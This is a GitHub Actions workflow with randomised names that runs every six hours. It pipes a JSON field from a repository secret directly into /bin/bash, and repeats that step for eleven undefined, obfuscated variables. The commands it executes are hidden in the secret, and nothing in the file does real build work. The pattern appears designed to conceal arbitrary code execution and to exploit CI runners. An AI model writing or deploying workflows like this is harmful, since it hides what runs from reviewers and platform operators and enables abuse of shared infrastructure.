name: heavyheadach

on:
  workflow_dispatch:
  schedule:
    - cron: '34 4/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: heavyheadach
        env:
          dwb3: ${{ secrets.dwb3 }}
        run: |
          echo $dwb3 | jq -r .zul9206 | /bin/bash
          echo $rkig361 | jq -r .ga60042 | /bin/bash
          echo $wg34322 | jq -r .jopj344 | /bin/bash
          echo $dsks9 | jq -r .vyzq0 | /bin/bash
          echo $t606 | jq -r .qcia3213 | /bin/bash
          echo $zy46396 | jq -r .fb6578 | /bin/bash
          echo $o7 | jq -r .cnskl138 | /bin/bash
          echo $angxm118 | jq -r .yu35604 | /bin/bash
          echo $vpc2922 | jq -r .tnhj15 | /bin/bash
          echo $lri0 | jq -r .u75 | /bin/bash
          echo $wb194 | jq -r .zo7 | /bin/bash
          echo $uzc34 | jq -r .shf81551 | /bin/bash

